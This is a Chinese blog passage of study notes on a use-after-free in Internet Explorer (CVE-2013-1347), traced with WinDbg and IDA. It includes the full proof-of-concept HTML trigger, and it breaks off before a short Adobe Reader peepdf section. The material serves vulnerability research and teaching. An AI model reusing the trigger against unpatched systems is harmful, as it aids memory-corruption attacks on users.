释放重引用漏洞(来自<<漏洞战争一书>>

zoukankan html css js c++ java

释放重引用漏洞(来自<<漏洞战争一书>>
1.简介

基本问题是当堆内存被释放后又重新申请内存时,新申请的内存与刚释放的内存有重合的部分, 被释放的内存虽然已被释放掉,但指向该内存的指针还存在,

如果操作该指针就可能修改掉新申请内存数据. 如当在堆中创建一个对象,p指向它,该对象释放后,又重新申请堆内存,而且这2次内存有重合的部分,此时新的内存

如果可控,且又引用了该指针(如调用虚函数),即可能执行任意代码

2.CVE-2013-1347-Microsoft IE CGenericElement 释放重引用漏洞

根据poc代码分析漏洞

ie加载到windbg后,开启hpa: gflags.exe -i iexlpore +hpa

继续运行并加载poc后断下:

0:024> g
(6f4.8fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=72389100 ebx=1679afb0 ecx=1824afc8 edx=00000000 esi=084eccb0 edi=00000000
eip=7200b68d esp=084ecc84 ebp=084ecc9c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
mshtml!CElement::Doc:
7200b68d 8b01 mov eax,dword ptr [ecx] ds:002b:1824afc8=????????

由于是开启hpa后断下的,所以可以查看ecx详细信息:

0:005> !gflag
Current NtGlobalFlag contents: 0x02000000
hpa - Place heap allocations at ends of pages
0:005> !heap -p -a ecx
address 1824afc8 found in
_DPH_HEAP_ROOT @ 1b1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
18162340: 1824a000 2000
746c90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
779b1464 ntdll!RtlDebugFreeHeap+0x0000002f
7796ab3a ntdll!RtlpFreeHeap+0x0000005d
77913472 ntdll!RtlFreeHeap+0x00000142
767014dd kernel32!HeapFree+0x00000014
71f5c83a mshtml!CGenericElement::`vector deleting destructor'+0x0000003d
72011daf mshtml!CBase::SubRelease+0x00000022
7200a6b5 mshtml!CElement::PrivateRelease+0x0000002a
72007894 mshtml!PlainRelease+0x00000025
72053862 mshtml!PlainTrackerRelease+0x00000014
7329a735 jscript!VAR::Clear+0x0000005f
732b6e46 jscript!GcContext::Reclaim+0x000000b6
732b43e9 jscript!GcContext::CollectCore+0x00000123

由红色区域可知这个CGenericElement对象进行了析构

此处的反汇编:

0:005> ub
mshtml!CElement::SecurityContext+0x22:
7200b681 8b01 mov eax,dword ptr [ecx]　　　　; 很明显的ecx是this指针,eax是虚函数表指针
7200b683 8b5070 mov edx,dword ptr [eax+70h]
7200b686 ffe2 jmp edx
7200b688 90 nop
7200b689 90 nop
7200b68a 90 nop
7200b68b 90 nop
7200b68c 90 nop

回到poc中:
<!doctype html>  <HTML> <head> </head> <body> <ttttt:whatever id="myanim"/> <script> f0=document.createElement('span');//对此创建元素的函数进行逆向分析 document.body.appendChild(f0); f1=document.createElement('span'); document.body.appendChild(f1); f2=document.createElement('span'); document.body.appendChild(f2); document.body.contentEditable="true"; f2.appendChild(document.createElement('datalist')); //has to be a data list f1.appendChild(document.createElement('table')); //has to be a table try{ f0.offsetParent=null; //required }catch(e){ } f2.innerHTML=""; //required f0.appendChild(document.createElement('hr')); //required f1.innerHTML=""; //required CollectGarbage(); </script> </body> </html>
先查询一下符号:

0:005> x mshtml!*document*createElement*
71f65e8d mshtml!CDocument::createElement = <no type information>
72016ec0 mshtml!s_methdescCDocumentcreateElement = <no type information>
71f65ee6 mshtml!CDocument::CreateElementHelper = <no type information>

在ida中定位函数CDocument::createElement, 发现其底层调用了CDocument::CreateElementHelper

跟进该函数:

又调用了CMarkup::CreateElement(ELEMENT_TAG,CElement * *,ushort *,long) 函数创建元素

继续跟进发现该函数很庞大, 直接找call, 看还有没有更深层次的创建元素的函数, 发现有一处:

CreateElement(struct CHtmTag *, struct CElement **, struct CDoc *, struct CMarkup *, int *, unsigned __int32)

继续跟进该函数.

这里其实有2个同名函数(可能是ida,windbg或者符号文件的问题),书上讲的是71f9141a 这个,而我用ida跟进时确是71fcd6de .这不知道是怎么回事

0:005> dd mshtml!createelement
Matched: 71f9141a mshtml!CreateElement = <no type information>
Matched: 71fcd6de mshtml!CreateElement = <no type information>
Ambiguous symbol error at 'mshtml!createelement'

mov eax, ecx　　;这里又不知道是不是this指针,因为ecx在该函数中没有被赋值过
.text:74D6143A shl eax, 4　　;如果ecx是this指针,这里又不知道怎么解释,而且这是这个模块的一个全局函数不是某对象的成员函数
.text:74D6143D add eax, offset ?g_atagdesc@@3QBVCTagDesc@@B ; CTagDesc const * const g_atagdesc
.text:74D61442 jz loc_74EB3FF6
.text:74D61448 mov [ebp+var_84], edi ; edi==0
.text:74D6144E mov byte ptr [ebp+var_84+1], cl
.text:74D61454 lea ecx, [ebp+arg_8]
.text:74D61457 push ecx
.text:74D61458 push edx
.text:74D61459 mov edx, [eax+8]
.text:74D6145C lea ecx, [ebp+var_84]
.text:74D61462 push ecx
.text:74D61463 mov [ebp+var_80], edi
.text:74D61466 call edx

根据这个东西 ?g_atagdesc@@3QBVCTagDesc@@B 的值只能猜测是对其进行索引了,通过索引访问对应的类的函数调用

直接来到span元素的createelement函数:

.text:74D18F8C mov edi, edi
.text:74D18F8E push ebp
.text:74D18F8F mov ebp, esp
.text:74D18F91 push esi
.text:74D18F92 push 28h ; dwBytes
.text:74D18F94 push 8 ; dwFlags
.text:74D18F96 push _g_hProcessHeap ; hHeap
.text:74D18F9C call ds:__imp__HeapAlloc@12 ; HeapAlloc(x,x,x); 分配内存
.text:74D18FA2 mov esi, eax
.text:74D18FA4 test esi, esi
.text:74D18FA6 jz short loc_74D18FD2 ;如果返回0则清空eax并返回.
.text:74D18FA8 push [ebp+arg_4]
.text:74D18FAB push 5Bh
.text:74D18FAD call ??0CElement@@QAE@W4ELEMENT_TAG@@PAVCDoc@@@Z ; CElement::CElement(ELEMENT_TAG,CDoc *);父类构造函数
.text:74D18FB2 mov dword ptr [esi], offset ??_7CSpanElement@@6B@ ; const CSpanElement::`vftable'
.text:74D18FB8 mov eax, esi
.text:74D18FBA
.text:74D18FBA loc_74D18FBA: ; CODE XREF: CSpanElement::CreateElement(CHtmTag *,CDoc *,CElement * *)+48j
.text:74D18FBA mov ecx, [ebp+arg_8]
.text:74D18FBD mov [ecx], eax
.text:74D18FBF neg eax
.text:74D18FC1 sbb eax, eax
.text:74D18FC3 and eax, 7FF8FFF2h
.text:74D18FC8 add eax, 8007000Eh
.text:74D18FCD pop esi
.text:74D18FCE pop ebp
.text:74D18FCF retn 0Ch

对其父类构造函数下记录断点:

0:013> bl
0 e 71fc9ff1 0001 (0001) 0:**** mshtml!CElement::CElement+0x1e ".echo '--- CElement --- ';dd edi l(28/4);gc"
0:013> bu mshtml!createelement
Matched: 71f9141a mshtml!CreateElement = <no type information>
Matched: 71fcd6de mshtml!CreateElement = <no type information>
Ambiguous symbol error at 'mshtml!createelement'
0:013> bp 71fcd715 "ln eax;gc"

0:013> g
'--- CElement --- '
0adb2fd8 71e55570 00000001 00000008 00000000
0adb2fe8 00000000 00000000 00000000 00000000
0adb2ff8 00000000 00000000
(71f977d2) mshtml!CCommentElement::CreateElement | (71f97880) mshtml!`string'
Exact matches:
mshtml!CCommentElement::CreateElement = <no type information>
'--- CElement --- '
0ab01fc8 71e55570 00000001 00000008 00000000
0ab01fd8 00000000 00000000 00000000 00000000
0ab01fe8 00000000 00000000
(71f977d2) mshtml!CCommentElement::CreateElement | (71f97880) mshtml!`string'
Exact matches:
mshtml!CCommentElement::CreateElement = <no type information>
'--- CElement --- '
0b4a2fc8 71e55570 00000001 00000008 00000000
0b4a2fd8 00000000 00000000 00000000 00000000
0b4a2fe8 00000000 00000000
(71f91547) mshtml!CHtmlElement::CreateElement | (71f91598) mshtml!CHtmlElement::`vftable'
Exact matches:
mshtml!CHtmlElement::CreateElement = <no type information>
'--- CElement --- '
0a920fd8 71e55570 00000001 00000008 00000000
0a920fe8 00000000 00000000 00000000 00000000
0a920ff8 00000000 00000000
(71f9181d) mshtml!CHeadElement::CreateElement | (71f91868) mshtml!CHeadElement::`vftable'
Exact matches:
mshtml!CHeadElement::CreateElement = <no type information>
'--- CElement --- '
0b786fd8 71e55570 00000001 00000008 00000000
0b786fe8 00000000 00000000 00000000 00000000
0b786ff8 00000000 00000000
'--- CElement --- '
0b0e2fd0 71e55570 00000001 00000008 00000000
0b0e2fe0 00000000 00000000 00000000 00000000
0b0e2ff0 00000000 00000000
(71f90bba) mshtml!CBodyElement::CreateElement | (71f90c08) mshtml!CBodyElement::CBodyElement
Exact matches:
mshtml!CBodyElement::CreateElement = <no type information>
'--- CElement --- '
0c2a8fd0 71e55570 00000001 00000008 00000000
0c2a8fe0 00000000 00000000 00000000 00000000
0c2a8ff0 00000000 00000000
'--- CElement --- '
0b7d9fd0 71e55570 00000001 00000008 00000000
0b7d9fe0 00000000 00000000 00000000 00000000
0b7d9ff0 00000000 00000000
(71f977d2) mshtml!CCommentElement::CreateElement | (71f97880) mshtml!`string'
Exact matches:
mshtml!CCommentElement::CreateElement = <no type information>
'--- CElement --- '
0ac9ffc8 71e55570 00000001 00000008 00000000
0ac9ffd8 00000000 00000000 00000000 00000000
0ac9ffe8 00000000 00000000
(71fef96d) mshtml!CScriptElement::CreateElement | (71fef9b7) mshtml!CScriptElement::CScriptElement
Exact matches:
mshtml!CScriptElement::CreateElement = <no type information>
'--- CElement --- '
0b6a8f98 71e55570 00000001 00000008 00000000
0b6a8fa8 00000000 00000000 00000000 00000000
0b6a8fb8 00000000 00000000
ModLoad: 747b0000 74862000 C:WindowsSysWOW64jscript.dll
eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=7ef99000 edi=0863c070
eip=778ffc52 esp=0863bf44 ebp=0863bf98 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!ZwMapViewOfSection+0x12:
778ffc52 83c404 add esp,4
0:005> g
(71f48f8c) mshtml!CSpanElement::CreateElement | (71f48fd8) mshtml!CSpanElement::`vftable'
Exact matches:
mshtml!CSpanElement::CreateElement = <no type information>
'--- CElement --- '
0b722fd8 71e55570 00000001 00000008 00000000
0b722fe8 00000000 00000000 00000000 00000000
0b722ff8 00000000 00000000
(71f48f8c) mshtml!CSpanElement::CreateElement | (71f48fd8) mshtml!CSpanElement::`vftable'
Exact matches:
mshtml!CSpanElement::CreateElement = <no type information>
'--- CElement --- '
0c078fd8 71e55570 00000001 00000008 00000000
0c078fe8 00000000 00000000 00000000 00000000
0c078ff8 00000000 00000000
(71f48f8c) mshtml!CSpanElement::CreateElement | (71f48fd8) mshtml!CSpanElement::`vftable'
Exact matches:
mshtml!CSpanElement::CreateElement = <no type information>
'--- CElement --- '
09c0cfd8 71e55570 00000001 00000008 00000000
09c0cfe8 00000000 00000000 00000000 00000000
09c0cff8 00000000 00000000
(71f5c4de) mshtml!CGenericElement::CreateElement | (71f5c523) mshtml!CGenericElement::CGenericElement
Exact matches:
mshtml!CGenericElement::CreateElement = <no type information>
'--- CElement --- '
0acb3fc8 71e55570 00000001 00000008 00000000
0acb3fd8 00000000 00000000 00000000 00000000
0acb3fe8 00000000 00000000
(71f3a55d) mshtml!CTable::CreateElement | (71f3a59e) mshtml!CTable::CTable
Exact matches:
mshtml!CTable::CreateElement = <no type information>
'--- CElement --- '
0b5edfb8 71e55570 00000001 00000008 00000000
0b5edfc8 00000000 00000000 00000000 00000000
0b5edfd8 00000000 00000000
(71f2d66d) mshtml!CHRElement::CreateElement | (71f2d6c3) mshtml!CHRElement::ApplyDefaultFormat
Exact matches:
mshtml!CHRElement::CreateElement = <no type information>
'--- CElement --- '
0c05efd8 71e55570 00000001 00000008 00000000
0c05efe8 00000000 00000000 00000000 00000000
0c05eff8 00000000 00000000
(be0.1b0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=72389100 ebx=0b461fb0 ecx=0acb3fc8 edx=00000000 esi=0863cdc8 edi=00000000
eip=7200b68d esp=0863cd9c ebp=0863cdb4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
mshtml!CElement::Doc:
7200b68d 8b01 mov eax,dword ptr [ecx] ds:002b:0acb3fc8=????????

经过调试后可见代码中:

71fcd6fa 0fb64701 movzx eax,byte ptr [edi+1] ;这里取1字节填充eax,高位填充0
71fcd6fe c1e004 shl eax,4　　; 低4bit变成0了
71fcd701 0520390272 add eax,offset mshtml!g_atagdesc (72023920);又加上了这个值,这3条指令取到了对应的虚表
71fcd706 0f8405691100 je mshtml!CreateElement+0x2b (720e4011)
71fcd70c 8b4008 mov eax,dword ptr [eax+8];此时的eax+8的eax应该是虚表
71fcd70f 8d4d10 lea ecx,[ebp+10h]
71fcd712 51 push ecx
71fcd713 52 push edx
71fcd714 57 push edi
71fcd715 ffd0 call eax;对这里解析eax, eax是某对象的createElement函数地址值

然后再看appendChild

0:005> x mshtml!*appendChild*
71f65acf mshtml!CElement::appendChild = <no type information>
721b1590 mshtml!CAttribute::appendChild = <no type information>
721b09f4 mshtml!CDOMTextNode::appendChild = <no type information>
7209d1d8 mshtml!s_methdescCAttributeappendChild = <no type information>
7201d720 mshtml!s_methdescCElementappendChild = <no type information>
71f6d65e mshtml!CDocument::appendChild = <no type information>

该函数没有分支,调用了CElement::insertBefore(IHTMLDOMNode *,tagVARIANT,IHTMLDOMNode * *)

继续跟进: 调用了CElement::InsertBeforeHelper(IUnknown *,IUnknown *)

对该函数下断,然后单步跟踪:

0:005>
eax=00000000 ebx=0be7af30 ecx=00000000 edx=00000007 esi=11652fd8 edi=00000000
eip=70cb5c14 esp=086fb234 ebp=086fb290 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
mshtml!CElement::InsertBeforeHelper+0xb8:
70cb5c14 56 push esi
0:005>
eax=00000000 ebx=0be7af30 ecx=00000000 edx=00000007 esi=11652fd8 edi=00000000
eip=70cb5c15 esp=086fb230 ebp=086fb290 iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
mshtml!CElement::InsertBeforeHelper+0xb9:
70cb5c15 e831000000 call mshtml!CElement::GetDOMInsertPosition (70cb5c4b)

将GetDOMInsertPosition 函数放在ida中查看参数,esi是某对象指针

继续:

eax=086fb5c4 ebx=0be7af30 ecx=00000000 edx=00000000 esi=11652fd8 edi=117cefd8
eip=70cb5c25 esp=086fb5b4 ebp=086fb610 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
mshtml!CElement::InsertBeforeHelper+0xc9:
70cb5c25 ff75f0 push dword ptr [ebp-10h] ss:002b:086fb600=00000000
0:005>
eax=086fb5c4 ebx=0be7af30 ecx=00000000 edx=00000000 esi=11652fd8 edi=117cefd8
eip=70cb5c28 esp=086fb5b0 ebp=086fb610 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
mshtml!CElement::InsertBeforeHelper+0xcc:
70cb5c28 e88dfdffff call mshtml!CCommentElement::`scalar deleting destructor'+0x17c (70cb59ba) ;这里书上是unicodecharactercount 可能是符号文件的问题

跟进:

0:005>
eax=086fb5c4 ebx=0be7af30 ecx=117cefd8 edx=00000000 esi=11652fd8 edi=117cefd8
eip=70cb59cd esp=086fb528 ebp=086fb5a8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
mshtml!CCommentElement::`scalar deleting destructor'+0x18f:
70cb59cd e8bb5c0a00 call mshtml!CElement::Doc (70d5b68d)
0:005>
eax=09650680 ebx=0be7af30 ecx=117cefd8 edx=70d5b65d esi=11652fd8 edi=117cefd8
eip=70cb59d2 esp=086fb528 ebp=086fb5a8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
mshtml!CCommentElement::`scalar deleting destructor'+0x194:
70cb59d2 8b4f1c mov ecx,dword ptr [edi+1Ch] ds:002b:117ceff4=02010000
0:005> ln eax
0:005> ln poi(eax)
(70d52028) mshtml!CDoc::`vftable' | (70d5fc58) mshtml!CDoc::`vftable'
Exact matches:
mshtml!CDoc::`vftable' = <no type information>

又来到

70c9ad8b 6a01 push 1
0:005>
eax=086fb5c4 ebx=0be7af30 ecx=00000000 edx=70d5b65d esi=09650680 edi=117cefd8
eip=70c9ad8d esp=086fb524 ebp=086fb5a8 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000287
mshtml!CCommentElement::`scalar deleting destructor'+0x229:
70c9ad8d 6a00 push 0
0:005>
eax=086fb5c4 ebx=0be7af30 ecx=00000000 edx=70d5b65d esi=09650680 edi=117cefd8
eip=70c9ad8f esp=086fb520 ebp=086fb5a8 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000287
mshtml!CCommentElement::`scalar deleting destructor'+0x22b:
70c9ad8f 57 push edi
0:005>
eax=086fb5c4 ebx=0be7af30 ecx=00000000 edx=70d5b65d esi=09650680 edi=117cefd8
eip=70c9ad90 esp=086fb51c ebp=086fb5a8 iopl=0 nv up ei ng nz na pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000287
mshtml!CCommentElement::`scalar deleting destructor'+0x22c:
70c9ad90 e8f4feffff call mshtml!CDoc::InsertElement (70c9ac89)

继续跟进

尾部调用了mshtml!CMarkup::InsertElementInternal

mshtml!CDoc::InsertElement+0x84:
70c9ad0f 57 push edi
0:005>
eax=086fb4fc ebx=11f32fe0 ecx=1122cf30 edx=00000001 esi=086fb508 edi=1122cf30
eip=70c9ad10 esp=086fb4e0 ebp=086fb514 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
mshtml!CDoc::InsertElement+0x85:
70c9ad10 e8bc010000 call mshtml!CMarkup::InsertElementInternal (70c9aed1)

跟进直到:

eax=0cdc8fb0 ebx=00000000 ecx=00000000 edx=00000000 esi=086fb508 edi=086fb4fc
eip=70c9b073 esp=086fb444 ebp=086fb4d8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
mshtml!CMarkup::InsertElementInternal+0x205:
70c9b073 8b442418 mov eax,dword ptr [esp+18h] ss:002b:086fb45c=0cdc8fb0
0:005>
eax=0cdc8fb0 ebx=00000000 ecx=00000000 edx=00000000 esi=086fb508 edi=086fb4fc
eip=70c9b077 esp=086fb444 ebp=086fb4d8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
mshtml!CMarkup::InsertElementInternal+0x209:
70c9b077 e8a7fdffff call mshtml!CMarkup::SearchBranchForNodeInStory (70c9ae23)

查看一下参数
0:005> dd eax
0cdc8fb0 11652fd8 00000000 00000252 00020003
0cdc8fc0 00000051 00000000 11bfafc0 0cdc8fd8
0cdc8fd0 00000000 11bfafc0 00000062 00000000
0cdc8fe0 11f32fe0 11bfafd8 11f32fe0 00000000
0cdc8ff0 00000008 00000000 00000000 d0d0d0d0
0cdc9000 ???????? ???????? ???????? ????????
0cdc9010 ???????? ???????? ???????? ????????
0cdc9020 ???????? ???????? ???????? ????????
0:005> dd poi(eax)
11652fd8 70cd2010 00000001 00000008 00000000
11652fe8 00000000 0cdc8fb0 00000052 80006200
11652ff8 00000004 1122cf30 ???????? ????????
11653008 ???????? ???????? ???????? ????????
11653018 ???????? ???????? ???????? ????????
11653028 ???????? ???????? ???????? ????????
11653038 ???????? ???????? ???????? ????????
11653048 ???????? ???????? ???????? ????????

又是一个对象

0:005> ln 70cd2010
(70cd2010) mshtml!CRootElement::`vftable' | (70d5a050) mshtml!CDisplayPointer::`vftable'
Exact matches:
mshtml!CRootElement::`vftable' = <no type information>

70c9b088 6a4c push 4Ch
70c9b08a 6a08 push 8
70c9b08c ff3518840d71 push dword ptr [mshtml!g_hProcessHeap (710d8418)]
70c9b092 ff150013ba70 call dword ptr [mshtml!_imp__HeapAlloc (70ba1300)]

继续:

70c9b0a3 53 push ebx
70c9b0a4 ff742410 push dword ptr [esp+10h]
70c9b0a8 8bc8 mov ecx,eax
70c9b0aa e80a970c00 call mshtml!CTreeNode::CTreeNode (70d647b9)
70c9b0af 8bf0 mov esi,eax ;查看返回的eax:

0:005> dd eax
11790fb0 117cefd8 0cdc8fb0 ffff001f ffffffff
11790fc0 00000000 00000000 00000000 00000000
11790fd0 00000000 00000000 00000000 00000000
11790fe0 00000000 00000000 00000000 00000000
11790ff0 00000008 00000000 00000000 d0d0d0d0
11791000 ???????? ???????? ???????? ????????
11791010 ???????? ???????? ???????? ????????
11791020 ???????? ???????? ???????? ????????
0:005> dd 117cefd8
117cefd8 70cd0a90 00000002 00000008 00000000
117cefe8 13052ba0 00000000 8000001f 02010000
117ceff8 00000000 0be78fe8 ???????? ????????
117cf008 ???????? ???????? ???????? ????????
117cf018 ???????? ???????? ???????? ????????
117cf028 ???????? ???????? ???????? ????????
117cf038 ???????? ???????? ???????? ????????
117cf048 ???????? ???????? ???????? ????????
0:005> ln 70cd0a90
(70cd0a90) mshtml!CDivElement::`vftable' | (70d7cb74) mshtml!`string'
Exact matches:
mshtml!CDivElement::`vftable' = <no type information>

现在能找到被append的对象了,然后记录断点:

bp mshtml!CMarkup::InsertElementInternal+0x2a4 ".echo '--cTreeNode--';dd eax l1;dps poi(eax);gc"

重新调试,然后将2个断点下上:

0:000> bl
0 d 71839ff1 0001 (0001) 0:**** mshtml!CElement::CElement+0x1e ".echo '--- CElement --- ';dd edi l(28/4);gc"
1 e 717bb175 0001 (0001) 0:**** mshtml!CMarkup::InsertElementInternal+0x329 ".echo '--cTreeNode--';dd eax l1;dps poi(eax);gc"

0:000> bl
0 d 70d19ff1 0001 (0001) 0:**** mshtml!CElement::CElement+0x1e ".echo '--- CElement --- ';dd edi l(28/4);gc"
1 e 70c9b0af 0001 (0001) 0:**** mshtml!CMarkup::InsertElementInternal+0x23d ".echo '--CtreeNode--';dd eax l1;dps poi(eax) l1;gc"

继续运行:

'--- CElement --- '
0be92fd8 74805570 00000001 00000008 00000000
0be92fe8 00000000 00000000 00000000 00000000
0be92ff8 00000000 00000000
'--- CElement --- '
0b377fc8 74805570 00000001 00000008 00000000
0b377fd8 00000000 00000000 00000000 00000000
0b377fe8 00000000 00000000
'--- CElement --- '
0b50cfc8 74805570 00000001 00000008 00000000
0b50cfd8 00000000 00000000 00000000 00000000
0b50cfe8 00000000 00000000
'--- CElement --- '
0aaaafd8 74805570 00000001 00000008 00000000
0aaaafe8 00000000 00000000 00000000 00000000
0aaaaff8 00000000 00000000
'--- CElement --- '
0b7c4fd8 74805570 00000001 00000008 00000000
0b7c4fe8 00000000 00000000 00000000 00000000
0b7c4ff8 00000000 00000000
'--- CElement --- '
0b193fd0 74805570 00000001 00000008 00000000
0b193fe0 00000000 00000000 00000000 00000000
0b193ff0 00000000 00000000
'--- CElement --- '
0af9dfd0 74805570 00000001 00000008 00000000
0af9dfe0 00000000 00000000 00000000 00000000
0af9dff0 00000000 00000000
'--- CElement --- '
0b1fffd0 74805570 00000001 00000008 00000000
0b1fffe0 00000000 00000000 00000000 00000000
0b1ffff0 00000000 00000000
'--- CElement --- '
0b864fc8 74805570 00000001 00000008 00000000
0b864fd8 00000000 00000000 00000000 00000000
0b864fe8 00000000 00000000
'--- CElement --- '
0bea6f98 74805570 00000001 00000008 00000000
0bea6fa8 00000000 00000000 00000000 00000000
0bea6fb8 00000000 00000000
ModLoad: 73120000 731d2000 C:WindowsSysWOW64jscript.dll
eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=7ef99000 edi=0856c330
eip=778ffc52 esp=0856c204 ebp=0856c258 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!ZwMapViewOfSection+0x12:
778ffc52 83c404 add esp,4
0:005> g
'--- CElement --- '
0af34fd8 74805570 00000001 00000008 00000000
0af34fe8 00000000 00000000 00000000 00000000
0af34ff8 00000000 00000000
'--CtreeNode--'
0ab06fb0 0af34fd8
0af34fd8 748f8fd8 mshtml!CSpanElement::`vftable'
'--- CElement --- '
0ab94fd8 74805570 00000001 00000008 00000000
0ab94fe8 00000000 00000000 00000000 00000000
0ab94ff8 00000000 00000000
'--CtreeNode--'
0ab00fb0 0ab94fd8
0ab94fd8 748f8fd8 mshtml!CSpanElement::`vftable'
'--- CElement --- '
0ab7afd8 74805570 00000001 00000008 00000000
0ab7afe8 00000000 00000000 00000000 00000000
0ab7aff8 00000000 00000000
'--CtreeNode--'
089f5fb0 0ab7afd8
0ab7afd8 748f8fd8 mshtml!CSpanElement::`vftable'
'--- CElement --- '
0ac4ffc8 74805570 00000001 00000008 00000000
0ac4ffd8 00000000 00000000 00000000 00000000
0ac4ffe8 00000000 00000000
'--CtreeNode--'
0ae45fb0 0ac4ffc8
0ac4ffc8 7490c590 mshtml!CGenericElement::`vftable' ;书上说是datalist标签,根据poc.html其实可知datalist在table和span之间,而这里也是.
'--- CElement --- '
0b718fb8 74805570 00000001 00000008 00000000
0b718fc8 00000000 00000000 00000000 00000000
0b718fd8 00000000 00000000
'--CtreeNode--'
0b790fb0 0b718fb8
0b718fb8 74806488 mshtml!CTable::`vftable'　　;table标签
'--- CElement --- '
0b367fd8 74805570 00000001 00000008 00000000
0b367fe8 00000000 00000000 00000000 00000000
0b367ff8 00000000 00000000

'--CtreeNode--'
0ae74fb0 0b367fd8
0b367fd8 74809250 mshtml!CHRElement::`vftable' ;hr标签

继续代码:

try{
f0.offsetParent=null; //required 这条代码的作用是将它的祖先元素设置为NULL, 当没有css定位时,offsetParent属性即为body
}catch(e){ }

同理 ,搜索 x mshtml!*offsetParent*:

0:005> x mshtml!*offsetParent*
7483128e mshtml!CDisplayRequestGetOffsetParent::~CDisplayRequestGetOffsetParent = <no type information>
748311ca mshtml!CDisplayRequestGetOffsetParent::CDisplayRequestGetOffsetParent = <no type information>
748316cd mshtml!CDisplayBox::IsOffsetParent = <no type information>
74831709 mshtml!CDisplayBox::FindOffsetParent = <no type information>
74829d65 mshtml!CDisplayRequestGetOffsetParent::GetOffsetTopLeft = <no type information>
748312b3 mshtml!CLayoutBlock::IsOffsetParent = <no type information>
74831915 mshtml!CDisplayRequestGetOffsetParent::SetOffsetParentDisplayBox = <no type information>
748311e3 mshtml!CDisplayRequestGetOffsetParent::OffsetParent = <no type information>
7490cd62 mshtml!CElement::GetOffsetParentHelper = <no type information>
748319b1 mshtml!CTextDisplayBox::IsOffsetParent = <no type information>
749cc914 mshtml!s_propdescCElementoffsetParent = <no type information>
7483192d mshtml!CDisplayRequestGetOffsetParent::SetSourceDisplayBox = <no type information>
7490d418 mshtml!CElement::get_offsetParent = <no type information>
74831798 mshtml!CDisplayBox::TransformRectToOffsetParent = <no type information>

对mshtml!CElement::GetOffsetParentHelper开始处和结尾处下断调试:

'--CtreeNode--'
0af6efb0 09938fb8
09938fb8 747c6488 mshtml!CTable::`vftable'
Breakpoint 2 hit
eax=0957cfd8 ebx=00000000 ecx=748cd418 edx=00000000 esi=0957cfd8 edi=0845cfa8
eip=748ccd62 esp=0845cf10 ebp=0845cf20 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
mshtml!CElement::GetOffsetParentHelper:
748ccd62 8bff mov edi,edi

0:005> dd 0af6efb0
0af6efb0 09938fb8 09181fb0 ffff0261 ffffffff
0af6efc0 00000061 00000000 0bebefc0 09181fc0
0af6efd0 09181fc0 0af6efd8 00000052 00000000
0af6efe0 09181fd8 0b390fc0 0af6efc0 09181fd8
0af6eff0 00000008 00000000 00000000 d0d0d0d0

0:005> g
Breakpoint 3 hit
eax=0e79efb0 ebx=00000000 ecx=0c802fc0 edx=0845ced0 esi=0957cfd8 edi=0845cfa8
eip=748ccdde esp=0845cf10 ebp=0845cf20 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
mshtml!CElement::GetOffsetParentHelper+0x135:
748ccdde c3 ret
0:005> dd 0b390fb0
0b390fb0 0d071fc8 0bebefb0 000a0275 00000009 ;书上的是1
0b390fc0 00000151 00000001 0bebefc0 0e6a2fd8
0b390fd0 0bebefc0 0b390fd8 00000072 00000000
0b390fe0 00000000 0bebefd8 0b390fc0 0bebefd8
0b390ff0 00000018 0a8abfa0 00000000 d0d0d0d0

0:005> ln poi(0a8abfa0 )
(7489633c) mshtml!CTextBlock::`vftable' | (74896348) mshtml!CTableContainerBlock::`vftable'
Exact matches:
mshtml!CTextBlock::`vftable' = <no type information>

对treenode + 0xc 的4字节部分下内存写入断点:

待续...........

CVE-2013-3346-Adobe Reader ToolButton 释放重引用漏洞

1.使用peepdf分析 pdf, JavaScript, shellcode

基本命令:

Usage: ./peepdf.py [options] PDF_file

Version: peepdf 0.3 r235

Options:
-h, --help　　 show this help message and exit
-i, --interactive 　　 Sets console mode.
-s SCRIPTFILE,　 --load-script=SCRIPTFILE
　　　　Loads the commands stored in the specified file and execute them.
-c, --check-vt　　 Checks the hash of the PDF file on VirusTotal.
-f, --force-mode 　　 Sets force parsing mode to ignore errors.
-l, --loose-mode 　　 Sets loose parsing mode to catch malformed objects.
-m, 　　--manual-analysis
Avoids automatic Javascript analysis. Useful with
eternal loops like heap spraying.
-g, --grinch-mode 　　　　 Avoids colorized output in the interactive console.
